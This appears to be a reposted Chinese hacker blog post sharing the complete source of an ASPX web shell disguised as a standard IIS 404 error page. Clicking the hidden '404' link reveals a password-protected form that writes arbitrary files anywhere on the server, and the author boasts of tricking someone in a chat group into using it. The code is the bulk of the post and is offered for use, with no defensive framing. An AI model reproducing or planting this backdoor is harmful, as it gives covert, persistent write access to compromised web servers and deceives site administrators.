tyuy: 404超级隐藏aspx小马

404超级隐藏aspx小马

(2013-03-17 16:06:37)

标签：

转载

http://news.baidu.com/n?m=rddata&v=passport& callbackName=enterStateenterState("lsz110lsz110", "http://hi.baidu.com /sys/checkuser/lsz110lsz110/3");小黑中国QQ1440580渗透百度小学毕业水准有限，只能在此处记录 enterState("lsz110lsz110", "http://hi.baidu.com/sys/checkuser/lsz110lsz110/3"

原文地址：404超级隐藏aspx小马作者：DJ直嗨天亮

今天闲着蛋疼，就打算写一个aspx隐藏小马，最好是不容易被人发现的那种，不被发现时不可能的， 所以尽量的不被发现才是目的，这时我想到了404错误页面，如果当你打开一个网站，显示的是404错误页
面，你会干什么呢？当然是把IE关掉，对吧，但是谁都不会想到这个404粗错页面就是我们的小马。
哈哈 YD 开始。。。。。。花了一点时间写了一下、最后写好了以后，就拿人测试一下么，看看他能不能
看出破绽，噢啦啦。。。先群里面吼两声。。。看谁要webshell   、、就有人屁颠屁颠的跑来了
小马地址：

单击 “404”文字后弹出上传页面。。。

群里面吼两声。。。。

可怜的 “楼上都没蛋↑↑” 就这么被我忽悠了、、、

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Text"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">

    /// <summary>
    /// 本程序是本人蛋疼之作
    /// BY:街头诗人 QQ:396080648 http://hi.baidu.com/xahacker
    /// </summary>
    public string password = "shiren";    //密码，请修改
    protected void LinkButton1_Click(object sender, EventArgs e)
    {
        Label1.Visible = true;
        Label2.Visible = true;
        Label3.Visible = true;
        Url.Visible = true;
        Text.Visible = true;
        Pass.Visible = true;
        shiren.Visible = true;
        LinkButton2.Visible = true;
        string url = Request.PhysicalPath.ToString();
        Label1.Text = url;
    }
    protected void Button1_Click(object sender, EventArgs e)
    {
        if (Pass.Text == password)
        {
            FileStream file = new FileStream(Url.Text, FileMode.Create);
            StreamWriter steam = new StreamWriter(file,Encoding.UTF8);
            steam.Write(Text.Text, System.Text.Encoding.UTF8);
            steam.Close();
            file.Close();
            Label4.Text = "恭喜你！上传成功 BY:街头诗人 QQ:396080648 http://hi.baidu.com/xahacker";
        }
        else
        {
            Label4.Visible = true;
            Label4.Text = "不是自己的女人不要碰 BY:街头诗人 QQ:396080648 http://hi.baidu.com/xahacker";
        }


    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>无法找到该页</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
BODY { font: 9pt/12pt 宋体 }
H1 { font: 12pt/15pt 宋体 }
H2 { font: 9pt/12pt 宋体 }
A:link { color: red }
A:visited { color: maroon }
</style>
</head><body>
<form id="cike" runat="server">
<table width="500" border="0" cellspacing="10"><tr><td>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“<asp:LinkButton ID="LinkButton1" runat="server" Font-Underline="False" ForeColor="Black" OnClick="LinkButton1_Click">404</asp:LinkButton>”的标题。 </li>
<li>打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。<br />
    <asp:Label ID="Label1" runat="server" Height="28px" Text="Label" Width="425px" Visible="False" ForeColor="Fuchsia"></asp:Label><br />
    <asp:Label ID="Label3" runat="server" Text="你女人的名字：" Visible="False" ForeColor="Fuchsia"></asp:Label>
    <asp:TextBox ID="Pass" runat="server" TextMode="Password" Visible="False" Width="43px" ></asp:TextBox>
    <br />
    <asp:Label ID="Label4" runat="server" ForeColor="Fuchsia" Text="Label" Visible="False" Width="416px" Height="27px" Font-Size="14px"></asp:Label><br />
    <asp:Label ID="Label2" runat="server" Text="你想射到哪：" Visible="False" ForeColor="Fuchsia"></asp:Label>
    <asp:TextBox ID="Url" runat="server" Width="338px" Visible="False"></asp:TextBox><br />
    <asp:TextBox ID="Text" runat="server" Height="130px" TextMode="MultiLine" Width="416px" Visible="False"></asp:TextBox>
    <br />
    <asp:Button ID="shiren" runat="server" Text="诗人上传" Visible="False" OnClick="Button1_Click" />
    <asp:LinkButton ID="LinkButton2" runat="server" Font-Bold="True" Font-Strikeout="False" ForeColor="Fuchsia" PostBackUrl="http://hi.baidu.com/xahacker" Visible="False">去找诗人</asp:LinkButton></li>
</ul>
</td></tr></table>
</form>
</body></html>

tyuy

2013年6月1日星期六

404超级隐藏aspx小马

404超级隐藏aspx小马

转载

没有评论:

发表评论